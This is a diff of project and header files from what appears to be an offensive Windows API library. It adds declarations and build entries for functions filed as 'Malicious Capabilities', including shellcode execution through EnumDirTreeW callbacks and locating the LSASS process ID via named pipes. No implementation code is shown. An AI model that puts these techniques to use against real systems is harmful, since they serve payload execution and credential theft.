<ClCompile Include="GetPidFromWmiComInterface.cpp" />
|
||||
<ClCompile Include="GetProcAddress.cpp" />
|
||||
|
@ -209,6 +209,7 @@
|
|||
<ClCompile Include="MasqueradePebAsExplorer.cpp" />
|
||||
<ClCompile Include="MpfComModifyShortcutTarget.cpp" />
|
||||
<ClCompile Include="MpfComVssDeleteShadowVolumeBackups.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="OleGetClipboardData.cpp" />
|
||||
|
@ -230,6 +231,7 @@
|
|||
<ClCompile Include="ShellcodeExecViaEnumDateFormatsW.cpp" />
|
||||
<ClCompile Include="ShellcodeExecViaEnumDesktopsW.cpp" />
|
||||
<ClCompile Include="ShellcodeExecViaEnumDesktopWindows.cpp" />
|
||||
<ClCompile Include="ShellcodeExecViaEnumDirTreeW.cpp" />
|
||||
<ClCompile Include="StringCompare.cpp" />
|
||||
<ClCompile Include="StringConcat.cpp" />
|
||||
<ClCompile Include="StringCopy.cpp" />
|
||||
|
|
|
@ -369,7 +369,7 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPidFromPidBruteForcingW.cpp">
|
||||
<ClCompile Include="GetPidFromPidBruteForcing.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="TryLoadDllMultiMethod.cpp">
|
||||
|
@ -381,7 +381,7 @@
|
|||
<ClCompile Include="GetPidFromNtQueryFileInformation.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="GetPidFromPidBruteForcingExW.cpp">
|
||||
<ClCompile Include="GetPidFromPidBruteForcingEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Fingerprinting</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecViaCertEnumSystemStore.cpp">
|
||||
|
@ -411,6 +411,12 @@
|
|||
<ClCompile Include="ShellcodeExecViaEnumDesktopsW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution from Callback</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ShellcodeExecViaEnumDirTreeW.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Shellcode Execution from Callback</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -148,6 +148,7 @@ DWORD GetPidFromPidBruteForcingA(_In_ PCHAR ProcessNameWithExtension);
|
|||
DWORD GetPidFromNtQueryFileInformationW(_In_ PWCHAR FullBinaryPath);
|
||||
DWORD GetPidFromNtQueryFileInformationA(_In_ PCHAR FullBinaryPath);
|
||||
DWORD GetPidFromPidBruteForcingExW(_In_ PWCHAR ProcessNameWithExtension);
|
||||
DWORD GetPidFromPidBruteForcingExA(_In_ PCHAR ProcessNameWithExtension);
|
||||
|
||||
//malicious capabilities
|
||||
DWORD OleGetClipboardDataA(_Inout_ PCHAR Buffer);
|
||||
|
@ -167,6 +168,8 @@ BOOL ShellcodeExecViaEnumChildWindows(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei)
|
|||
BOOL ShellcodeExecViaEnumDateFormatsW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
BOOL ShellcodeExecViaEnumDesktopWindows(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
BOOL ShellcodeExecViaEnumDesktopsW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
BOOL ShellcodeExecViaEnumDirTreeW(_In_ PSHELLCODE_EXECUTION_INFORMATION Sei);
|
||||
DWORD MpfGetLsaPidFromNamedPipe(VOID);
|
||||
|
||||
//evasion
|
||||
BOOL CreateProcessWithCfGuardW(_Inout_ PPROCESS_INFORMATION Pi, _In_ PWCHAR Path);
|
||||
|
|
Loading…
Reference in New Issue